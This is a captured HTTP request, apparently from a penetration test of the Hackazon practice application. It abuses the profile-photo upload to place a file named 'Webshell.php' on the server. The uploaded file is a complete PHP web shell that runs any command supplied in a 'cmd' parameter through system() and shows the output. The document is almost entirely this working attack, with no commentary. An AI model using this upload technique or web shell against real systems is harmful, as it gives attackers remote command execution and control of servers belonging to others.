POST /account/profile/edit HTTP/2
Host: hackazon.trackflaw.com
Cookie: visited_products=%2C64%2C72%2C1%2C81%2C; PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------189735364826765907351405637159
Content-Length: 1214
Origin: https://hackazon.trackflaw.com
Referer: https://hackazon.trackflaw.com/account/profile/edit
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-Pwnfox-Color: red
Priority: u=0, i
Te: trailers

-----------------------------189735364826765907351405637159
Content-Disposition: form-data; name="_csrf_profile"

7snJ5pcYHD0B0leJoZzOIEftIZI8WHNQ
-----------------------------189735364826765907351405637159
Content-Disposition: form-data; name="first_name"

tototata
-----------------------------189735364826765907351405637159
Content-Disposition: form-data; name="last_name"

titi
-----------------------------189735364826765907351405637159
Content-Disposition: form-data; name="user_phone"


-----------------------------189735364826765907351405637159
Content-Disposition: form-data; name="photo"; filename="Webshell.php"
Content-Type: application/octet-stream

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>
-----------------------------189735364826765907351405637159
Content-Disposition: form-data; name="_submit_save_and_exit"

Save and Exit
-----------------------------189735364826765907351405637159--
